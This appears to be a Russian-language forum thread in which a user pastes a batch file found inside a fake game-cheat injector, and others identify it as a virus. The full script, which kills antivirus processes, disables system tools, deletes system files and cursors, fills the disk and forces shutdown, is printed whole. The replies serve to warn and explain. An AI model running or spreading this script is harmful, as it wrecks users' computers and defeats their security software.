Ребят что это такое???
Открыл инжектор чита с помощью архива и там был файл bat открываю bat с помощью блокнота а там это
@echo off
taskkill.exe /F /IM avesvc.exe /T
taskkill.exe /F /IM ashdisp.exe /T
taskkill.exe /F /IM avgcc.exe /T
echo 0000000000000000000000000000
echo I'm starting to inject
timeout 4 /nobreak
echo 0x930
echo ERROR when injecting {file .dll was not found} please turn off your antivirus and check the status of the .dll file
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
del "%SystemRoot%\Media" /q >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del "%SystemRoot%Cursors*.*" >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
del c:Program Files/q
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
del %0
assoc .lnk=.de
rundll32 user,SwapMouseButton
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
copy ""%0"" "%SystemRoot%\system32\injector.exe"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\injector.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Echo 999999999999999999999999999999999999999999
Date 1.01.1986
If exist c:injector.exe goto abc
Copy %0 c:injector.exe
Attrib +h c:injector.exe
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.de
del c:Program Files/q
rundll32 user,disableoemlayer
echo 00000000000000
del %systemroot%\system32\HAL.dll
shutdown -s -t 1 -c "virus extrimde.dll" >nul
Это командный блок запуска вируса, отключения антивирусов....
ну судя по коду он отключает диспетчер задач, рабочий стол, меняет кнопки местами, удаляет курсоры, сносит Program Files и пишет в итоге всякие гадости
это вирус удали его лучше он сносит всю винду нахрен
промой компьютер с мылом, этот файл сносит драйвера, отключает все важные функции короче сносит всю винду, удали и запиши сайт с которого скачал файл в черный список чтобы его избегать
читай внимательно))) чит-бот тебе пишет:
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK